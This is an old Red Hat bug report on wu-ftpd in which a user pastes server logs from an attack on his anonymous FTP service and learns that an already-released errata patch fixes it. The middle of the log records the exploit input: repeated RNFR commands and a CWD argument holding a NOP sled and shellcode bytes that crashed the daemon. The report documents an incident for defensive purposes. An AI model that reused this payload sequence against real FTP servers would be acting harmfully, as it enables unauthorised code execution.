Bug 66171

Summary: Security hole in FTPD
Product: [Retired] Red Hat Linux Reporter: Need Real Name <alex>
Component: anonftpAssignee: wdovlrrw <brosenkr>
Status: CLOSED ERRATA QA Contact: David Lawrence <dkl>
Severity: medium Docs Contact:
Priority: medium    
Version: 6.2Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2002-06-05 19:40:57 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Need Real Name 2002-06-05 19:07:03 UTC 
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)

Description of problem:
Attached is a fragment of the log file a few times left by some hacker in my PC.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
See "Additional Info"


Actual Results:  The hacker gains access to ~ftp directory.  Thanks god 
it's "chroot"ed.

Expected Results:  FTPD should not be crashed that easly.


Additional info:

Jun  4 22:51:34 hypres ftpd[714]: USER ftp
Jun  4 22:51:34 hypres ftpd[714]: PASS mozilla@
Jun  4 22:51:34 hypres ftpd[714]: ANONYMOUS FTP LOGIN FROM a-na25-23.tin.it 
[212.216.205.22], mozilla@
Jun  4 22:51:35 hypres ftpd[714]: RNFR ././
Jun  4 22:51:59 hypres last message repeated 72 times
Jun  4 22:51:59 hypres ftpd[714]: PWD
Jun  4 22:51:59 hypres ftpd[714]: CWD 
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000PP*P*P*P-
P*P*P*,^E^G^H^X5^H^HP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^L\220\220\220\220\220\220\220\220\220\220\220
\2201QCT^KtQ^K-
^A^A^A^AP\211Pj^DX\211P1P<\200P^N1QPP&P'P9Yj^CXP<\200P^EP%PP*P*P*
Jun  4 22:52:00 hypres ftpd[714]: CWD /pub/.
Jun  4 22:52:00 hypres ftpd[714]: CWD .
Jun  4 22:52:01 hypres ftpd[714]: RNFR ././././././././.
Jun  4 22:52:01 hypres ftpd[714]: CWD 735073
Jun  4 22:52:01 hypres ftpd[714]: CWD 73507
Jun  4 22:52:02 hypres ftpd[714]: CWD 7350P
Jun  4 22:52:02 hypres ftpd[714]: RNFR .
Jun  4 22:52:02 hypres ftpd[714]: RNFR ./././././././.
Jun  4 22:52:02 hypres ftpd[714]: exiting on signal 11: Segmentation fault
Jun  4 22:52:02 hypres inetd[848]: pid 714: exit status 1
Comment 1 Bernhard Rosenkraenzer 2002-06-05 19:10:01 UTC 
Did you install all errata packages? This looks a lot like a problem we fixed
some months ago.
Comment 2 Need Real Name 2002-06-05 19:40:51 UTC 
Oh, right you are.  I did download the patch for wu-ftpd, but forgot to upgrate 
it.  My falt, - sorry.  Thanks a lot!